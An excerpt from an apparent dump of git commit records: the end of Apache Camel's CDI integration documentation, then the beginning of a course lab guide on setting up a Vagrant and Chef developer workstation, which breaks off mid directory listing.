CDI bean qualified\nwith\u00a0`@Named(\"jtaTransactionManager\")`:\n\n[source,java]\n----\n@Produces\n@Named(\"jtaTransactionManager\")\nPlatformTransactionManager createTransactionManager(TransactionManager transactionManager, UserTransaction userTransaction) {\n JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();\n jtaTransactionManager.setUserTransaction(userTransaction);\n jtaTransactionManager.setTransactionManager(transactionManager);\n jtaTransactionManager.afterPropertiesSet();\n return jtaTransactionManager;\n}\n----\n\n### Camel events to CDI events\n\n*Available as of Camel 2.17*\n\nCamel provides a set\nof\u00a0link:http:\/\/camel.apache.org\/maven\/current\/camel-core\/apidocs\/org\/apache\/camel\/management\/event\/package-summary.html[management\nevents]\u00a0that can be subscribed to for listening to Camel context,\nservice, route and exchange events. Camel CDI seamlessly translates\nthese Camel events into CDI events that can be observed using\nCDI\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethods], e.g.:\n\n[source,java]\n----\nvoid onContextStarting(@Observes CamelContextStartingEvent event) {\n \/\/ Called before the default Camel context is about to start\n}\n----\n\nAs of Camel 2.18, it is possible to observe events for a particular route (`RouteAddedEvent`,\n`RouteStartedEvent`, `RouteStoppedEvent` and `RouteRemovedEvent`) should it have\nan explicit defined, e.g.:\n\n[source,java]\n----\nfrom(\"...\").routeId(\"foo\").to(\"...\");\n\nvoid onRouteStarted(@Observes @Named(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route \"foo\" has started\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to refine the\nobserver method resolution to a particular Camel context as specified\nin\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], e.g.:\n\n[source,java]\n----\nvoid onRouteStarted(@Observes @ContextName(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route 'event.getRoute()' for the Camel context 'foo' has started\n}\n\u00a0\nvoid onContextStarted(@Observes @Manual CamelContextStartedEvent event) {\n \/\/ Called after the the Camel context qualified with '@Manual' has started\n}\n----\n\nSimilarly, the\u00a0`@Default`\u00a0qualifier can be used to observe Camel events\nfor the\u00a0_default_\u00a0Camel context if multiples contexts exist, e.g.:\n\n[source,java]\n----\nvoid onExchangeCompleted(@Observes @Default ExchangeCompletedEvent event) {\n \/\/ Called after the exchange 'event.getExchange()' processing has completed\n}\n----\n\nIn that example, if no qualifier is specified, the\u00a0`@Any`\u00a0qualifier is\nimplicitly assumed, so that corresponding events for all the Camel\ncontexts get received.\n\nNote that the support for Camel events translation into CDI events is\nonly activated if observer methods listening for Camel events are\ndetected in the deployment, and that per Camel context.\n\n### CDI events endpoint\n\n*Available as of Camel 2.17*\n\nThe CDI event endpoint bridges\nthe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#events[CDI\nevents]\u00a0with the Camel routes so that CDI events can be seamlessly\nobserved \/ consumed (resp. produced \/ fired) from Camel consumers (resp.\nby Camel producers).\n\nThe\u00a0`CdiEventEndpoint<T>`\u00a0bean provided by Camel CDI can be used to\nobserve \/ consume CDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(cdiEventEndpoint).log(\"CDI event received: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:event\")\nProducerTemplate producer;\n\nvoid observeCdiEvents(@Observes String event) {\n producer.sendBody(event);\n}\n\nfrom(\"direct:event\").log(\"CDI event received: ${body}\");\n----\n\nConversely, the\u00a0`CdiEventEndpoint<T>`\u00a0bean can be used to produce \/ fire\nCDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint).log(\"CDI event sent: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\").process(new Processor() {\n @Override\n public void process(Exchange exchange) {\n event.fire(exchange.getBody(String.class));\n }\n}).log(\"CDI event sent: ${body}\");\n----\n\nOr using a Java 8 lambda expression:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\")\n .process(exchange -> event.fire(exchange.getIn().getBody(String.class)))\n .log(\"CDI event sent: ${body}\");\n----\n\nThe type variable\u00a0`T` (resp. the qualifiers) of a\nparticular\u00a0`CdiEventEndpoint<T>`\u00a0injection point are automatically\ntranslated into the parameterized\u00a0_event type_\u00a0(resp. into the\u00a0_event\nqualifiers_)\u00a0e.g.:\n\n[source,java]\n----\n@Inject\n@FooQualifier\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @FooQualifier List<String> event) {\n logger.info(\"CDI event: {}\", event);\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to qualify\nthe\u00a0`CdiEventEndpoint<T>`\u00a0injection points, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\/\/ Only observes \/ consumes events having the @ContextName(\"foo\") qualifier\nfrom(cdiEventEndpoint).log(\"Camel context (foo) > CDI event received: ${body}\");\n\/\/ Produces \/ fires events with the @ContextName(\"foo\") qualifier\nfrom(\"...\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @ContextName(\"foo\") List<String> event) {\n logger.info(\"Camel context (foo) > CDI event: {}\", event);\n}\n----\n\nNote that the CDI event Camel endpoint dynamically adds\nan\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethod]\u00a0for each unique combination of\u00a0_event type_\u00a0and\u00a0_event\nqualifiers_\u00a0and solely relies on the container\ntypesafe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], which leads to an implementation as efficient as possible.\n\nBesides, as the impedance between the\u00a0_typesafe_\u00a0nature of CDI and\nthe\u00a0_dynamic_\u00a0nature of\nthe\u00a0link:http:\/\/camel.apache.org\/component.html[Camel component]\u00a0model is\nquite high, it is not possible to create an instance of the CDI event\nCamel endpoint via\u00a0link:http:\/\/camel.apache.org\/uris.html[URIs]. Indeed, the\nURI format for the CDI event component is:\n\n[source,text]\n----\ncdi-event:\/\/PayloadType<T1,...,Tn>[?qualifiers=QualifierType1[,...[,QualifierTypeN]...]]\n----\n\nWith the authority\u00a0`PayloadType`\u00a0(resp. the\u00a0`QualifierType`) being the\nURI escaped fully qualified name of the payload (resp. qualifier) raw\ntype followed by the type parameters section delimited by angle brackets\nfor payload parameterized type. Which leads to\u00a0_unfriendly_\u00a0URIs,\ne.g.:\n\n[source,text]\n----\ncdi-event:\/\/org.apache.camel.cdi.example.EventPayload%3Cjava.lang.Integer%3E?qualifiers=org.apache.camel.cdi.example.FooQualifier%2Corg.apache.camel.cdi.example.BarQualifier\n----\n\nBut more fundamentally, that would prevent efficient binding between the\nendpoint instances and the observer methods as the CDI container doesn't\nhave any ways of discovering the Camel context model during the\ndeployment phase.\n\n### Camel XML configuration import\n\n*Available as of Camel 2.18*\n\nWhile CDI favors a typesafe dependency injection mechanism, it may be\nuseful\u00a0to reuse existing Camel XML configuration files into a Camel CDI\napplication.\u00a0In other use cases, it might be handy to rely on the Camel\nXML DSL to configure\u00a0its Camel context(s).\n\nYou can use the\u00a0`@ImportResource` annotation that's provided by Camel\nCDI on any CDI beans and Camel CDI will automatically load the Camel XML\nconfiguration at the specified locations, e.g.:\n\n[source,java]\n----\n@ImportResource(\"camel-context.xml\")\nclass MyBean {\n}\n----\n\nCamel CDI will load the resources at the specified locations from the\nclasspath (other protocols may be added in the future).\n\nEvery `CamelContext` elements and other Camel _primitives_ from the\nimported resources are automatically deployed as CDI beans during the\ncontainer bootstrap so that they benefit from the auto-configuration\nprovided by Camel CDI and become available for injection at runtime. If\nsuch an element has an explicit `id` attribute set, the corresponding\nCDI bean is qualified with the `@Named` qualifier, e.g., given the\nfollowing Camel XML configuration:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <endpoint id=\"bar\" uri=\"seda:inbound\">\n <property key=\"queue\" value=\"#queue\"\/>\n <property key=\"concurrentConsumers\" value=\"10\"\/>\n <\/endpoint>\n<camelContext\/>\n----\n\nThe\u00a0corresponding CDI beans are automatically deployed and can be\ninjected, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCamelContext context;\n\n@Inject\n@Named(\"bar\")\nEndpoint endpoint;\n----\n\nNote that the\u00a0`CamelContext`\u00a0beans are automatically qualified with both\nthe\u00a0`@Named`\u00a0and\u00a0`@ContextName`\u00a0qualifiers. If the\nimported\u00a0`CamelContext`\u00a0element doesn't have an\u00a0`id`\u00a0attribute, the\ncorresponding bean is deployed with the built-in\u00a0`@Default`\u00a0qualifier.\n\nConversely, CDI beans deployed in the application can be referred to\nfrom the Camel XML configuration, usually using the\u00a0`ref`\u00a0attribute,\ne.g., given the following bean declared:\n\n[source,java]\n----\n@Produces\n@Named(\"baz\")\nProcessor processor = exchange -> exchange.getIn().setHeader(\"qux\", \"quux\");\n----\n\nA reference to that bean can be declared in the imported Camel XML\nconfiguration, e.g.:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <route>\n <from uri=\"...\"\/>\n <process ref=\"baz\"\/>\n <\/route>\n<camelContext\/>\n----\n\n\n### Transaction support\n\n*Available as of Camel 2.19*\n\nCamel CDI provides support for Camel transactional client using JTA.\n\nThat support is optional hence you need to have JTA in your application classpath, e.g., by explicitly add JTA as a dependency when using Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>javax.transaction<\/groupId>\n <artifactId>javax.transaction-api<\/artifactId>\n <scope>runtime<\/scope>\n<\/dependency>\n----\n\nYou'll have to have your application deployed in a JTA capable container or provide a standalone JTA implementation.\n\n[CAUTION]\n====\nNote that, for the time being, the transaction manager is looked up as JNDI resource with the `java:\/TransactionManager` key.\n\nMore flexible strategies will be added in the future to support a wider range of deployment scenarios.\n====\n\n#### Transaction policies\n\nCamel CDI provides implementation for the typically supported Camel `TransactedPolicy` as CDI beans. It is possible to have these policies looked up by name using the transacted EIP, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .transacted(\"PROPAGATION_REQUIRED\")\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThis would be equivalent to:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Inject\n @Named(\"PROPAGATION_REQUIRED\")\n Policy required;\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .policy(required)\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThe list of supported transaction policy names is:\n\n- `PROPAGATION_NEVER`,\n- `PROPAGATION_NOT_SUPPORTED`,\n- `PROPAGATION_SUPPORTS`,\n- `PROPAGATION_REQUIRED`,\n- `PROPAGATION_REQUIRES_NEW`,\n- `PROPAGATION_NESTED`,\n- `PROPAGATION_MANDATORY`.\n\n#### Transactional error handler\n\nCamel CDI provides a transactional error handler that extends the redelivery error handler, forces a rollback whenever an exception occurs and creates a new transaction for each redelivery.\n\nCamel CDI provides the `CdiRouteBuilder` class that exposes the `transactionErrorHandler` helper method to enable quick access to the configuration, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends CdiRouteBuilder {\n\n @Override\n public void configure() {\n errorHandler(transactionErrorHandler()\n .setTransactionPolicy(\"PROPAGATION_SUPPORTS\")\n .maximumRedeliveries(5)\n .maximumRedeliveryDelay(5000)\n .collisionAvoidancePercent(10)\n .backOffMultiplier(1.5));\n }\n}\n----\n\n\n### Auto-configured OSGi integration\n\n*Available as of Camel 2.17*\n\nThe Camel context beans are automatically adapted by Camel CDI so that\nthey are registered as OSGi services and the various resolvers\n(like\u00a0`ComponentResolver` and\u00a0`DataFormatResolver`) integrate with the\nOSGi registry. That means that the link:karaf.html[Karaf Camel commands]\ncan be used to operate the Camel contexts auto-configured by Camel CDI,\ne.g.:\n\n[source,brush:,text;,gutter:,false;,theme:,Default]\n----\nkaraf@root()> camel:context-list\n Context Status Total # Failed # Inflight # Uptime\n ------- ------ ------- -------- ---------- ------\n camel-cdi Started 1 0 0 1 minute\n----\n\nSee the\u00a0`camel-example-cdi-osgi` example for a working example of the\nCamel CDI OSGi integration.\n\n\n### Lazy Injection \/ Programmatic Lookup\n\nWhile the CDI programmatic model favors a http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#typesafe_resolution[typesafe resolution]\nmechanism that occurs at application initialization time, it is possible to perform\ndynamic \/ lazy injection later during the application execution using the\nhttp:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#programmatic_lookup[programmatic lookup]\nmechanism.\n\nCamel CDI provides for convenience the annotation literals corresponding to the\nCDI qualifiers that you can use for standard injection of Camel primitives.\nThese annotation literals can be used in conjunction with the `javax.enterprise.inject.Instance`\ninterface which is the CDI entry point to perform lazy injection \/ programmatic lookup.\n\nFor example, you can use the provided annotation literal for the `@Uri` qualifier\nto lazily lookup for Camel primitives, e.g. for `ProducerTemplate` beans:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<ProducerTemplate> producers;\n\nProducerTemplate inbound = producers\n .select(Uri.Literal.of(\"direct:inbound\"))\n .get();\n----\n\nOr for `Endpoint` beans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<Endpoint> endpoints;\n\nMockEndpoint outbound = endpoints\n .select(MockEndpoint.class, Uri.Literal.of(\"mock:outbound\"))\n .get();\n----\n\nSimilarly, you can use the provided annotation literal for\nthe `@ContextName` qualifier to lazily lookup for `CamelContext`\nbeans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nCamelContext context = contexts\n .select(ContextName.Literal.of(\"foo\"))\n .get();\n----\n\nYou can also refined the selection based on the Camel context type, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\n\/\/ Refine the selection by type\nInstance<DefaultCamelContext> context = contexts.select(DefaultCamelContext.class);\n\n\/\/ Check if such a bean exists then retrieve a reference\nif (!context.isUnsatisfied())\n context.get();\n----\n\nOr even iterate over a selection of Camel contexts, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nfor (CamelContext context : contexts)\n context.setUseBreadcrumb(true);\n----\n\n\n### Maven Archetype\n\nAmong the available\u00a0link:camel-maven-archetypes.html[Camel Maven\narchetypes], you can use the provided\u00a0`camel-archetype-cdi`\u00a0to generate\na Camel CDI Maven project, e.g.:\n\n[source,bash]\n----\nmvn archetype:generate -DarchetypeGroupId=org.apache.camel.archetypes -DarchetypeArtifactId=camel-archetype-cdi\n----\n\n### Supported containers\n\nThe Camel CDI component is compatible with any CDI 1.0, CDI 1.1 and CDI\n1.2 compliant runtime. It's been successfully tested against the\nfollowing runtimes:\n\n[width=\"100%\",cols=\"2,1m,2\",options=\"header\",]\n|============================================\n|Container |Version |Runtime\n|Weld SE |1.1.28.Final |CDI 1.0 \/ Java SE 7\n|OpenWebBeans |1.2.7 |CDI 1.0 \/ Java SE 7\n|Weld SE |2.3.4.Final |CDI 1.2 \/ Java SE 7\n|OpenWebBeans |1.6.3 |CDI 1.2 \/ Java SE 7\n|WildFly |8.2.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |9.0.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |10.0.0.Final |CDI 1.2 \/ Java EE 7\n|Karaf |2.4.4 |CDI 1.2 \/ OSGi 4 \/ PAX CDI\n|Karaf |3.0.5 |CDI 1.2 \/ OSGi 5 \/ PAX CDI\n|Karaf |4.0.4 |CDI 1.2 \/ OSGi 6 \/ PAX CDI\n|============================================\n\n\n### Examples\n\nThe following examples are available in the `examples` directory of the\nCamel project:\n\n[width=\"100%\",cols=\"1m,3\",options=\"header\",]\n|============================================\n|Example |Description\n\n|camel-example-cdi\n|Illustrates how to work with Camel using CDI to configure components,\nendpoints and beans\n\n|camel-example-cdi-kubernetes\n|Illustrates the integration between Camel, CDI and Kubernetes\n\n|camel-example-cdi-metrics\n|Illustrates the integration between Camel, Dropwizard Metrics and CDI\n\n|camel-example-cdi-properties\n|Illustrates the integration between Camel, DeltaSpike and CDI for\nconfiguration properties\n\n|camel-example-cdi-osgi\n|A\u00a0CDI application using the SJMS component that can be executed\ninside an OSGi container using PAX CDI\n\n|camel-example-cdi-rest-servlet\n|Illustrates the Camel REST DSL being used in a Web application that\nuses CDI as dependency injection framework\n\n|camel-example-cdi-test\n|Demonstrates the testing features that are provided as part of\nthe integration between Camel and CDI\n\n|camel-example-cdi-xml\n|Illustrates the use of Camel XML configuration\nfiles into a Camel CDI application\n\n|camel-example-swagger-cdi\n|An example using REST DSL and Swagger Java with CDI\n\n|camel-example-widget-gadget-cdi\n|The Widget and Gadget use-case from the EIP book implemented\nin Java with CDI dependency Injection\n\n|============================================\n\n### See Also\n\n* link:cdi-testing.html[Camel CDI testing]\n* http:\/\/www.cdi-spec.org[CDI specification Web site]\n* http:\/\/www.cdi-spec.org\/ecosystem\/[CDI ecosystem]\n* http:\/\/weld.cdi-spec.org[Weld home page]\n* http:\/\/openwebbeans.apache.org[OpenWebBeans home page]\n* https:\/\/github.com\/astefanutti\/further-cdi[Going further with CDI and Camel]\n(See Camel CDI section)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"07a3c2a7c6be210faf6846418746e4b4965ea690","subject":"Lab 03","message":"Lab 03\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-03\/03-tech-lab.adoc","new_file":"Lab-03\/03-tech-lab.adoc","new_contents":"= Lab 03 (Technical) The core application practices\n\n== Bringing up the VM\n\n**Overview**\n\nThe purpose of this lab is to give you a realistic, if brief overview of (reasonably) modern application development practices.\n\nLab objectives:\n\nIn this lab, you will work with basic application tools, as an individual developer. You will see test-driven development in action, in a very simple form, with automated build and deployment to a local Tomcat instance.\n\nYou will start by initializing a Vagrant machine that has been preconfigured as a simple developer workstation with:\n\n* https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java]\n* http:\/\/junit.org\/[JUnit]\n* http:\/\/ant.apache.org\/[Ant]\n* http:\/\/tomcat.apache.org\/[Tomcat]\n* https:\/\/git-scm.com\/[git]\n\n**Prerequisites**\n\nYou must have completed lab 2 and issued pull requests for me.\n\n**Clone the Examples repository**\n\nLog into the main server via ssh in the usual way.\n\nMake sure you are in your home directory.\n\n cd ~\n\nInstall the following Vagrant plugin (you do have permissions to do this)\n\n....\nYourStudentID@serverXXX:~$ vagrant plugin install vagrant-berkshelf\nInstalling the 'vagrant-berkshelf' plugin. This can take a few minutes...\nInstalled the plugin 'vagrant-berkshelf (4.0.4)'!\nPost install message from the 'vagrant-berkshelf' plugin:\n\nThe Vagrant Berkshelf plugin requires Berkshelf from the Chef Development Kit.\nYou can download the latest version of the Chef Development Kit from:\n\n https:\/\/downloads.getchef.com\/chef-dk\n\nInstalling Berkshelf via other methods is not officially supported.\n....\n\nClone the Calavera project:\n\n....\nYourStudentID@serverXXX:~$ git clone https:\/\/github.com\/dm-academy\/Calavera.git\nCloning into 'Calavera'...\nremote: Counting objects: 1447, done.\nremote: Compressing objects: 100% (87\/87), done.\nremote: Total 1447 (delta 45), reused 0 (delta 0), pack-reused 1350\nReceiving objects: 100% (1447\/1447), 45.53 MiB | 3.09 MiB\/s, done.\nResolving deltas: 100% (652\/652), done.\nChecking connectivity... done.\n....\nChange to the Calavera directory:\n\n YourStudentID@serverXXX:~$ cd Calavera\/\n\nNow, you will see a new Vagrantfile. Have a look at it:\n\n YourStudentID@serverXXX:~\/Calavera$ more Vagrantfile\n\n(File is lengthy. More only shows you one screen at a time. You can hit the space bar repeatedly to go through it, or q to exit.)\n\nThere are a number of machines defined, such as\n\n\n....\n###############################################################################\n################################### base #################################\n###############################################################################\n....\n\nEach section like that defines how Vagrant should bring up a machine and configure it. There are a number of new commands we haven't seen before. Let's focus on the following:\n\n....\n\n###############################################################################\n################################### manos1 ##############################\n###############################################################################\n\n config.vm.define \"manos1\" do | manos1 |\n manos1.vm.host_name =\"manos1.calavera.biz\"\n manos1.vm.network \"private_network\", ip: \"10.1.0.14\"\n manos1.vm.network \"forwarded_port\", guest: 22, host: 2114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 80, host: 8114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 8080, host: 9114, auto_correct: true\n\n manos1.ssh.forward_agent =true\n\n manos1.vm.synced_folder \".\", \"\/home\/manos1\"\n manos1.vm.synced_folder \".\/shared\", \"\/mnt\/shared\"\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\n manos1.vm.provision :chef_zero do |chef|\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n chef.data_bags_path = [\".\/data_bags\/\"]\n chef.nodes_path = [\".\/nodes\/\"]\n chef.roles_path = [\".\/roles\/\"]\n chef.add_recipe \"shared::_apt-update\"\n chef.add_recipe \"git::default\"\n chef.add_recipe \"localAnt::default\"\n chef.add_recipe \"java7::default\" # this is redundant. we already installed this in base and tomcat also installs Java. but won't work w\/o it.\n chef.add_recipe \"localTomcat::v8\"\n chef.add_recipe \"shared::_junit\"\n chef.add_recipe \"manos::default\"\n if ENV['LAB_NUM']==\"lab03\"\n puts \"Skipping remote git\"\n else\n chef.add_recipe \"manos::git-remote.rb\"\n end\n end\n end\n....\n\nYou used a shell provisioner in your previous lab to apply your script to your new VM. But what's this? This line in the example above\n\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\nis commented out (the # means that Vagrant won't execute that line).\n\nRather than using a shell provisioner to install software on our VM, we are starting to use Chef. As mentioned in the http:\/\/dm-academy.github.io\/aitm\/#_policy_based_approaches[readings for Session 02], Chef is a configuration management system.\n\nNow, http:\/\/searchaws.techtarget.com\/definition\/Opscode-Chef[read a bit about Chef] and https:\/\/docs.chef.io\/chef_quick_overview.html[a bit more] before you continue.\n\nA full treatment of Chef is beyond the scope of this class. However, you should understand a few things. You should still be in your Calavera directory. Run the tree command:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree\n\n\u251c\u2500\u2500 Berksfile\n\u251c\u2500\u2500 Berksfile.lock\n\u251c\u2500\u2500 cookbooks\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 base\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 calaverahosts\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ssh.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _hosts.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _ssh.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 brazos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cara\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cerebro\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 post-receive\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 espina\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 hombros\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 hijoConfig.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 OLD-hijoInit.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 org.jfrog.hudson.ArtifactoryBuilder.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java7\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java8\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localAnt\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 env.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ant.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localJenkins\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localTomcat\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 v6.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 v8.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 manos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 